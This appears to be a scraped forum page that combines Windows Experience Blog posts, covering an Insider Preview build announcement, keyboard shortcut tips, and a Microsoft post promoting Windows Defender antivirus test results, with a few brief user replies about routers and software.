Hello Windows Insiders! Today, we are releasing Windows 10 Insider Preview Build 17133 (RS4) to Windows Insiders in the Fast ring. Just like in Build 17128, you will also notice that the watermark at the lower right-hand corner of the desktop has disappeared in Build 17133. Again, we are in the phase of checking in final code to prepare for the final release. General changes, improvements, and fixes for PC We fixed an issue resulting in certain devices with BitLocker enabled unexpectedly booting into BitLocker recovery in recent flights. We fixed an issue resulting in not being able to change the display resolution when there were 4 or more monitors connected, due to the confirmation prompt hanging when you selected “Keep changes”. We fixed an issue where clicking suggested search terms when typing in the Microsoft Edge URL bar didn’t do anything. Known issues There are currently no major known issues for this flight however if any issues are discovered based off Insider feedback, we’ll add them here. No downtime for Hustle-As-A-Service, Dona The post Announcing Windows 10 Insider Preview Build 17133 for Fast appeared first on Windows Experience Blog. Continue reading...

Yes it will. I used it when I had Windows 7 as my OS and it worked well. In fact since it was released I used it.

We’ve showed you how to clear your workspace in two simple steps and three ways you can personalize your desktop with fun themes and colors – today, we’re going to show you six keyboard shortcuts to help you easily find what you’re looking for! Find apps, files and more on your PC Press the Windows logo key and type the name of whatever you want to find in the search box. Easily search Settings Press Windows logo key + I, then search for the setting you’re looking for. Switch between open windows Hold down the Alt key and keep pressing Tab until the window you want is selected. Then, release the Alt key. Add a touch keyboard shortcut to the taskbar Right-click on the taskbar, and then select Show touch keyboard button. Get to your desktop quickly Press Windows logo key + D to minimize all your open windows and go right to your desktop. Open File Explorer Press Windows logo key + E, then open the folder you want in File Explorer. In case you missed it, check out last week’s tip on how to view 360° videos and photos in Microsoft Edge with your Windows Mixed Reality headset! The post Windows 10 Tip: Six keyboard shortcuts to help you find what you’re looking for appeared first on Windows Experience Blog. Continue reading...

I went with a 2 ASUS ROUTER RT-AC86U to replace the 2 I have. They can function as mesh routers. My son suggested them. Should be a good upgrade.

Statistics about the success and sophistication of malware can be daunting. The following figure is no different: Approximately 96% of all malware is polymorphic meaning that it is only experienced by a single user and device before it is replaced with yet another malware variant. This is because in most cases malware is caught nearly as fast as its created, so malware creators continually evolve to try and stay ahead. Data like this hammer home how important it is to have security solutions in place that are as agile and innovative as the attacks. The type of security solution needed has a complex job: It must protect users from hundreds of thousands of new threats every day and then it must learn and grow to stay ahead of the next wave of attacks. The solution cannot just react to the latest threats; it must be able to predict and prevent malware infections. Over the last year, weve talked about how were investing in new innovations to address this challenging threat landscape, what weve delivered, and how it will change the dynamics. Today, I want to share the results of our new antivirus capabilities in Windows Defender Advanced Threat Protection (ATP) which are genuinely incredible because they will directly benefit the work you are doing. Currently, our antivirus capabilities on Windows 10 are repeatedly earning top scores on independent tests, often outperforming the competition. This performance is the result of a complete redesign of our security solution. Whats more, this same technology is available for our Windows 7 customers as well, so that they can remain secure during their transition to Windows 10. It started back in 2015 Weve been working to make our antivirus capabilities increasingly more effective, and in 2015 our results in two major independent tests (AV-Comparatives and AV-TEST) began to improve dramatically. As you can see in the chart below, beginning in March 2015 our scores on AV-TEST began to rise rapidly, and, over the course of the next five months, we moved from scores averaging 85% on their Prevalence Test to (or near) 100%. Since then, weve maintained those types of scores consistently. Our scores on AV-Comparatives experienced a very similar spike, trajectory, and results. In December 2017, we reached another milestone on AV-TEST, where we achieved a perfect score across both the Prevalence and Real-World based tests. Previously we had only scored a perfect 100% on one of the two tests for a given month. The following chart from the AV-TEST site shows our scores from November and December 2017 on Windows 7. These same scores are also applicable to Windows 10, which shares the same technology (and more). For AV-Comparatives, we recently achieved another important quality milestone: For five consecutive months we detected all malware samples. Our previous best was four consecutive months. The AV-Comparatives chart below shows our February 2018 results where we scored a perfect 100% block rate. While independent antivirus tests are one indicator of a security solutions capabilities and protections, its important to understand that this is only one part of a complete quality assessment. For example, in the case of Windows Defender ATP (which integrates our antivirus capabilities and the whole Windows security stack), our customers have a much larger set of protection features none of which are factored into the tests. These features provide additional layers of protection that help prevent malware from getting onto devices in the first place. These features include the following: Windows Defender System Guard Windows Defender Application Guard Windows Defender Application Control Windows Defender Exploit Guard If organizations like AV-Comparatives and AV-TEST performed complete security stack tests (i.e., testing against the complete endpoint protection solution) the results would often tell a very different story. For example, in November, we scored a 98.9% based on a single file miss on the Real-World test. The good news, however, is that we would have scored 100% if either Windows Defender Application Guard or Application Control was enabled. How did we achieve these results? The short answer is that we completely redesigned our antivirus solutions for both Windows 7 and Windows 10 from the ground up. To do this, we moved away from using a static signature-based engine that couldnt scale due to its dependence on constant input from researchers. Weve now moved to a model that uses predictive technologies, machine learning, applied science, and artificial intelligence to detect and stop malware at first sight. We described the use of these technologies in our recent posts on Emotet and BadRabbit, as well as the recent Dofoil outbreak. These are the types of approaches that can be very successful against the ongoing avalanche of malware threats. Because of these changes, our antivirus solution can now block malware using local and cloud-based machine learning models, combined with behavior, heuristic, and generic-based detections on the client. We can block nearly all of it at first sight and in milliseconds! This is incredible. Weve also designed our antivirus solution to work in both online and offline scenarios. When connected to the cloud, its fed real-time intelligence from the Intelligent Security Graph. For offline scenarios, the latest dynamic intelligence from the Graph is provisioned to the endpoint regularly throughout the day. Weve also built our solution to defend against the new wave of fileless attacks, like Petya and WannaCry. To read more about how we protect against these attacks, check out the blog post Now you see me: Exposing fileless malware. What this means to you Each of these milestones is great, but the thing that makes us the most excited here at Microsoft is very simple: Customer adoption. Right now, we are seeing big growth in enterprise environments our across all of our platforms: 18% of Windows 7 and Windows 8 devices are using our antivirus solution Over 50% of Windows 10 devices are using our antivirus solution These are awesome numbers and proof that customers trust Windows security. What we are seeing is that as organizations are moving to Windows 10 they are also moving to our antivirus as their preferred solution. With our antivirus solution being used on more than 50% percent of the Windows 10 PCs deployed in commercial organizations, it is now the most commonly used antivirus solution in commercial organizations on that platform. This usage is in commercial customers of all sizes from small and medium-sized businesses to the largest enterprise organizations. Over the past couple of months Ive shared this data with multiple customers, and often Im asked why weve seen such a positive increase. The answer is simple: Our antivirus capabilities are a fantastic solution! The test results above really speak for themselves. With five months of top scores that beat some of our biggest competitors, you can be confident that our solution can protect you from the most advanced threats. Our solution is both easier and operationally cheaper to maintain than others. Most enterprise customers use Config Manager for PC management of Windows 7 and Windows 10 security features, including antivirus. With Windows 10, the antivirus capabilities are built directly into the operating system and theres nothing to deploy. Windows 7 didnt include antivirus capabilities by default, but it can be deployed and configured in Config Manager. Now organizations do not have to maintain two infrastructures one for PC management and another for antivirus. Several years ago, our Microsoft IT department retired the separate global infrastructure that was used to manage Microsofts antivirus solution and now you can too! With our solution theres less to maintain and secure. Our solution enables IT to be more agile. On Windows 10 theres no agent security is built into the platform. When a new update of Windows 10 is released, you dont need to wait for a 3rd party to certify and support it; instead, you have full support and compatibility on day one. This means that new releases of Windows and all the latest security technologies can be deployed faster. This allows you to get current, stay current, and be more secure. Our solution offers a better user experience. Its designed to work behind the scenes in a way that is unobtrusive to end users and minimizes power consumption. This means longer battery life and everyone wants more battery life! While weve made excellent progress with our antivirus solution, Im even more excited about the protection and management capabilities we will deliver to our customers in the near future. In the meantime, one of the best ways to evaluate our antivirus capabilities is when you run it with Windows Defender ATP. With Windows Defender ATP, the power of the Windows security stack provides preventative protection, detects attacks and zero-day exploits, and gives you centralized management for your end-to-end security lifecycle. Sign up to try Windows Defender ATP for yourself! Continue reading...